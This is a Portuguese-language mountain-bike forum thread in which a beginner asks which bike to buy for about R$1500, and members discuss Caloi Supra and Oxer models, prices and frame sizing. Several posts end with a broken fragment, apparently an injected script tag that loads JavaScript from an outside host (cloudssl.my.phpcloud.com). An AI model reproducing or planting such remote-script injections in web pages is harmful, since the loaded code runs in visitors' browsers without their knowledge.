| PEDAL | HOME | ARTIGOS | BIKES | CLASSIFICADOS | FORUM | FOTOS | VIDEOS | NOTICIAS | TRILHAS | SERVICOS | CONTATO | + |
Fórum Início Fórum Início > Assuntos Gerais > Fórum Principal
  Tópicos recentes Tópicos recentes RSS Feed - MTB até R$1500
   [REGRAS]    Ajuda Ajuda  Procurar no fórum   Registrar Registrar  Entrar Entrar

Utilizamos cookies para melhorar a sua experiencia no site. Ao continuar navegando voce concorda com a nossa politica de privacidade.

MTB até R$1500

Responder Responder
Autor
Mensagem
  Tópico Procurar Tópico Procurar  Opções do Tópico Opções do Tópico
victor_oliveira Ver Drop Down

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Tópico: MTB até R$1500
    Enviado: 01 Mai 2014 as 11:18
E aí moçada, tudo jóia? Sou novo no fórum e no mundo das bikes. Andei procurando por aqui e por alguns sites e achei algumas bikes bacanas e preciso de opiniões sobre elas. Meu uso vai ser para ir à faculdade diariamente (cerca de 5km), pegar uma estrada horizontal ou serrana(cerca de 30km no máximo) e fazer alguma trilha de leve, nada fora do normal, e pretendo pagar em torno de R$1500. Tenho algumas opções aqui, e se vocês tiverem algo melhor, por favor mostrem. Grato desde já. Obs: Tenho 1,80 e peso 75kg

Oxer XR210 (http://www.centauro.com.br/bicicleta-oxer-xr210-2013.html?cor=29)

Soul Cycles Black Rain (http://www.centauro.com.br/bicicleta-soul-cycles-black-rain-2013.html?cor=02)

Caloi Supra 10 disc (http://www.netshoes.com.br/produto/bicicleta-caloi-supra-10-disc--aro-26-124-0025-006)

Caloi Supra (http://www.netshoes.com.br/produto/bicicleta-caloi-supra--aro-26-124-0070-006)

Oxer wr210 (http://www.centauro.com.br/bicicleta-oxer-mountain-bike-aro-26.html) <- essa é a minha favorita, no momento, todavia não a encontrei disponível
Voltar para o topo
Stcunha Ver Drop Down
Bloqueado

Brasil
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Stcunha Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 11:39
Eu no seu lugar, se o quadro for do tamanho certo, pegaria a oxer xr110 por 720,00, ao inves da xr210. Guardaria o restante da grana e assim q quebrasse algo faria os ups necessarios. Outras opcoes seria partir logo para uma bike melhor ou comprar um boooa bike usada.
Voltar para o topo
GabrielBike Ver Drop Down

São Paulo
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de GabrielBike Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 11:39
Então Cara, a Caloi Supra 10 acho que é a melhor opção daí, pelo que vi aqui no fórum.               
Vai vendo a configurações de cada uma e vai pesquisando as peças e vê qual e melhor entre elas. 

Voltar para o topo

São Paulo
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de GabrielBike Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 11:41
Originalmente Postado por Stcunha Stcunha Escreveu:

Eu no seu lugar, se o quadro for do tamanho certo, pegaria a oxer xr110 por 720,00, ao inves da xr210. Guardaria o restante da grana e assim q quebrasse algo faria os ups necessarios. Outras opcoes seria partir logo para uma bike melhor ou comprar um boooa bike usada.

A minha bike é uma XR110 da Oxer. Ótima bike para começar. 
Voltar para o topo
Stcunha Ver Drop Down
Bloqueado

Brasil
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Stcunha Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 11:49
Se procurar cupom de desconto as vezes compra ate a supra 20 por 1.650.
Voltar para o topo
Stcunha Ver Drop Down
Bloqueado

Brasil
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Stcunha Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 11:52
Originalmente Postado por GabrielBike GabrielBike Escreveu:

O quadro dela é 18? Por 720,00 deu até vontade de aumentar a frota. Kkkkkk....
Voltar para o topo

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 14:07
Opa! valeu moçada. Fiz uns calculos aqui e a Caloi Supra 20 sai por 1540, já com Capacete incluso. Vale mais a pena?< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Voltar para o topo
Spyke Ver Drop Down

Belém
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Spyke Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 14:13
Supra 10 disc amigo, vais gostar muito dela, ótima pra começar!
Prazer de viver na lama!
Voltar para o topo

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 14:17
Acho que vou ficar de Supra 20. Mas não sei que tamanho escolher. Fiz o bikefit outro dia e deu 17,89" se não me engano. Tenho 1,80m e fico receoso da 18 ficar pequena e a 20 ficar grande de mais...< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Voltar para o topo
lclucas Ver Drop Down

Curitiba
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de lclucas Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 15:05
Ajuste depois se faz no canote, com tão pouco pro 18, o 18 tá bom
Voltar para o topo

São Paulo
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de GabrielBike Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 15:27
Cara, vê na polario lá tem um monte de opção de bike por esse preço> www.polario.com.br 
Voltar para o topo

São Paulo
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de GabrielBike Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 15:28

Originalmente Postado por GabrielBike GabrielBike Escreveu:

O quadro dela é 18? Por 720,00 deu até vontade de aumentar a frota. Kkkkkk....
ACHO QUE E SIM.  
Voltar para o topo
Rafhaway Ver Drop Down

Campo Grande -
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Rafhaway Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 16:05
Vítor eu comprei a Supra 20 por 1530 e peguei a 16, tenho 1,70 e o Bike fit virtual deu 15,86.   Pra mim ela ficou legal no tamanho.    Duro que alguns dias depois apareceu a 30 por 1700.
Fica ligado que o estoque da netshoes acaba meio rápido quando tem promoção, mas rapidinho volta também.
Voltar para o topo
marcio neves Ver Drop Down

Belo Horizonte
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de marcio neves Citação de  ResponderResposta Link direto para este Post Enviado: 01 Mai 2014 as 22:25
Companheiro, aqui mesmo no site, nos classificados MTB, voce consegue uma bike bem montada com essa grana. 
Boa sorte! 
Voltar para o topo
jbtozetti Ver Drop Down

Mauá-SP
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de jbtozetti Citação de  ResponderResposta Link direto para este Post Enviado: 02 Mai 2014 as 02:32
Originalmente Postado por victor_oliveira victor_oliveira Escreveu:

Acho que vou ficar de Supra 20. Mas não sei que tamanho escolher. Fiz o bikefit outro dia e deu 17,89" se não me engano. Tenho 1,80m e fico receoso da 18 ficar pequena e a 20 ficar grande de mais...< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

provavelmente venha a ser o 18", porém a medida q vc tem q levar em consideração para escolha do quadro é a do top tube efetivo + mesa do seu bikefit comparada a mesma medida na geometria da bike (acrescentando 100mm da mesa), no caso do quadro tam 18" da Supra 30 ele tem 68,6cm, qual o top tube do seu bikefit?
Voltar para o topo

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Enviado: 03 Mai 2014 as 12:38
Top tube efetivo + Mesa: 67,25cm. Mas não tem como eu saber o da bike, pois pretendo comprá-la na net =/. Tô na duvida cruel entre o 18 e o 20... tenho medo do 18 ser pequeno.
Voltar para o topo

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Enviado: 03 Mai 2014 as 12:42
Originalmente Postado por jbtozetti jbtozetti Escreveu:

provavelmente venha a ser o 18", porém a medida q vc tem q levar em consideração para escolha do quadro é a do top tube efetivo + mesa do seu bikefit comparada a mesma medida na geometria da bike (acrescentando 100mm da mesa), no caso do quadro tam 18" da Supra 30 ele tem 68,6cm, qual o top tube do seu bikefit?
Top tube efetivo + Mesa: 67,25cm. Mas não tem como eu saber o da bike, pois pretendo comprá-la na net =/. Tô na duvida cruel entre o 18 e o 20... tenho medo do 18 ser pequeno.
Voltar para o topo

Sobral
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de victor_oliveira Citação de  ResponderResposta Link direto para este Post Enviado: 03 Mai 2014 as 13:34
Foi mal pela falta de pesquisa, pessoal. Mas, pesquisando melhor, achei que o Top tubo efetivo + mesa, da Supra 20 (18"), adicionados os 100mm fica sendo 68,6cm e o meu é 67,25cm. Posso comprar a 18" sem medo hehe? < ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Voltar para o topo
jbtozetti Ver Drop Down

Mauá-SP
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de jbtozetti Citação de  ResponderResposta Link direto para este Post Enviado: 04 Mai 2014 as 12:41

Foi mal pela falta de pesquisa, pessoal. Mas, pesquisando melhor, achei que o Top tubo efetivo + mesa, da Supra 20 (18"), adicionados os 100mm fica sendo 68,6cm e o meu é 67,25cm. Posso comprar a 18" sem medo hehe? < ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

pode sim

aí troque a mesa original por uma de 90mm q vai dar certinho, dependendo da bicicletaria vc consegue na base de troca na faixa Smile
Voltar para o topo

Responder Responder
  Compartilhar   

Ir para Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 11.06
Copyright ©2001-2016 Web Wiz Ltd.

X